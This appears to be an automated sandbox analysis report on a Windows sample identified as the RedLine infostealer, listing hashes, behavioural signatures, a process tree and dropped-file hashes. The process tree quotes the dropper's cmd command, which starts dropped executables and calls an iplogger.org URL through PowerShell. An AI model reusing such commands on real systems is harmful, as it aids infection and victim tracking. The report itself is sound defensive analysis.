Analysis
-
max time kernel
146s -
max time network
146s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
21-03-2021 12:01
Static task
static1
Behavioral task
behavioral1
Sample
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
Resource
win10v20201028
General
-
Target
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
-
Size
1.1MB
-
MD5
f5366963764901262499c8021333f986
-
SHA1
e57b794220e7a6184614ccd4a6ddcf99de7e0717
-
SHA256
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f
-
SHA512
84cde9fd4846e839fee7171546c76253c321af4bc619e2b0b4830077b9d966251e36217f60c6da6c31258770fbf71284a1896a7bc5b388c609ebf18be9c048d6
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/928-73-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral1/memory/928-74-0x0000000000421DFE-mapping.dmp family_redline behavioral1/memory/928-77-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 1412 powershell.exe 8 1412 powershell.exe -
Executes dropped EXE 7 IoCs
Processes:
hello_C# (2).exehello_C#.exejayson.exeriv.exejayson.exejayson.exejayson.exepid process 1484 hello_C# (2).exe 1968 hello_C#.exe 1784 jayson.exe 1704 riv.exe 1292 jayson.exe 1604 jayson.exe 928 jayson.exe -
Loads dropped DLL 9 IoCs
Processes:
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.execmd.exejayson.exepid process 1152 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe 2036 cmd.exe 2036 cmd.exe 2036 cmd.exe 2036 cmd.exe 2036 cmd.exe 1784 jayson.exe 1784 jayson.exe 1784 jayson.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
jayson.exedescription pid process target process PID 1784 set thread context of 928 1784 jayson.exe jayson.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exejayson.exepid process 1412 powershell.exe 1412 powershell.exe 1784 jayson.exe 1784 jayson.exe 1784 jayson.exe 1784 jayson.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exejayson.exejayson.exedescription pid process Token: SeDebugPrivilege 1412 powershell.exe Token: SeDebugPrivilege 1784 jayson.exe Token: SeDebugPrivilege 928 jayson.exe -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.execmd.exejayson.exedescription pid process target process PID 1152 wrote to memory of 2036 1152 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe cmd.exe PID 1152 wrote to memory of 2036 1152 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe cmd.exe PID 1152 wrote to memory of 2036 1152 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe cmd.exe PID 1152 wrote to memory of 2036 1152 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe cmd.exe PID 2036 wrote to memory of 1484 2036 cmd.exe hello_C# (2).exe PID 2036 wrote to memory of 1484 2036 cmd.exe hello_C# (2).exe PID 2036 wrote to memory of 1484 2036 cmd.exe hello_C# (2).exe PID 2036 wrote to memory of 1484 2036 cmd.exe hello_C# (2).exe PID 2036 wrote to memory of 1968 2036 cmd.exe hello_C#.exe PID 2036 wrote to memory of 1968 2036 cmd.exe hello_C#.exe PID 2036 wrote to memory of 1968 2036 cmd.exe hello_C#.exe PID 2036 wrote to memory of 1968 2036 cmd.exe hello_C#.exe PID 2036 wrote to memory of 1784 2036 cmd.exe jayson.exe PID 2036 wrote to memory of 1784 2036 cmd.exe jayson.exe PID 2036 wrote to memory of 1784 2036 cmd.exe jayson.exe PID 2036 wrote to memory of 1784 2036 cmd.exe jayson.exe PID 2036 wrote to memory of 1704 2036 cmd.exe riv.exe PID 2036 wrote to memory of 1704 2036 cmd.exe riv.exe PID 2036 wrote to memory of 1704 2036 cmd.exe riv.exe PID 2036 wrote to memory of 1704 2036 cmd.exe riv.exe PID 2036 wrote to memory of 1412 2036 cmd.exe powershell.exe PID 2036 wrote to memory of 1412 2036 cmd.exe powershell.exe PID 2036 wrote to memory of 1412 2036 cmd.exe powershell.exe PID 2036 wrote to memory of 1412 2036 cmd.exe powershell.exe PID 1784 wrote to memory of 1292 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 1292 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 1292 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 1292 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 1604 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 1604 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 1604 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 1604 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 928 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 928 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 928 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 928 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 928 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 928 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 928 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 928 1784 jayson.exe jayson.exe PID 1784 wrote to memory of 928 1784 jayson.exe jayson.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe"C:\Users\Admin\AppData\Local\Temp\38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "hello_C# (2).exe" & start "" "hello_C#.exe" & start "" "jayson.exe" & start "" "riv.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe"hello_C# (2).exe"3⤵
- Executes dropped EXE
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\hello_C#.exe"hello_C#.exe"3⤵
- Executes dropped EXE
PID:1968 -
C:\Users\Admin\AppData\Local\Temp\jayson.exe"jayson.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\jayson.exe"{path}"4⤵
- Executes dropped EXE
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\jayson.exe"{path}"4⤵
- Executes dropped EXE
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\jayson.exe"{path}"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:928 -
C:\Users\Admin\AppData\Local\Temp\riv.exe"riv.exe"3⤵
- Executes dropped EXE
PID:1704 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1412
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
bd96d90751fd507c3af0edbe0d596ec4
SHA1eed0bb7626d328190c7de701c0071f9c4ad048ef
SHA256f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
SHA5125948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338
-
MD5
bd96d90751fd507c3af0edbe0d596ec4
SHA1eed0bb7626d328190c7de701c0071f9c4ad048ef
SHA256f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
SHA5125948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19
-
MD5
bd96d90751fd507c3af0edbe0d596ec4
SHA1eed0bb7626d328190c7de701c0071f9c4ad048ef
SHA256f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
SHA5125948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338
-
MD5
bd96d90751fd507c3af0edbe0d596ec4
SHA1eed0bb7626d328190c7de701c0071f9c4ad048ef
SHA256f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
SHA5125948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338